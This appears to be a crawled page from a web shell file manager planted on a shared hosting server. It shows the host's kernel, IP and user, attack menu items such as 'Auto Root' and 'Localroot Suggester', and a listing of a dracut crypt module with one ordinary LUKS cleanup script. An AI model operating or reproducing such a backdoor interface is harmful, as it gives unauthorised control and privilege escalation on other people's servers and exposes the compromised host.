Linux business57.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
Server IP : 199.188.201.191 & Your IP : 3.19.255.255
Domains :
Cant Read [ /etc/named.conf ]
User : derozboy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
dracut /
modules.d /
90crypt /
Delete
Unzip
Name
Size
Permission
Date
Action
crypt-cleanup.sh
442
B
-rwxr-xr-x
2018-10-08 13:38
crypt-lib.sh
7.47
KB
-rwxr-xr-x
2018-10-08 13:38
crypt-run-generator.sh
770
B
-rwxr-xr-x
2018-10-08 13:38
cryptroot-ask.sh
4.76
KB
-rwxr-xr-x
2018-10-08 13:38
module-setup.sh
4.61
KB
-rwxr-xr-x
2024-04-06 13:22
parse-crypt.sh
6.97
KB
-rwxr-xr-x
2018-10-08 13:38
parse-keydev.sh
1.34
KB
-rwxr-xr-x
2018-10-08 13:38
probe-keydev.sh
382
B
-rwxr-xr-x
2018-10-08 13:38
Save
Rename
#!/bin/sh # close everything which is not busy rm -f -- /etc/udev/rules.d/70-luks.rules >/dev/null 2>&1 if ! getarg rd.luks.uuid -d rd_LUKS_UUID >/dev/null 2>&1 && getargbool 1 rd.luks -d -n rd_NO_LUKS >/dev/null 2>&1; then while true; do local do_break="y" for i in /dev/mapper/luks-*; do cryptsetup luksClose $i >/dev/null 2>&1 && do_break=n done [ "$do_break" = "y" ] && break done fi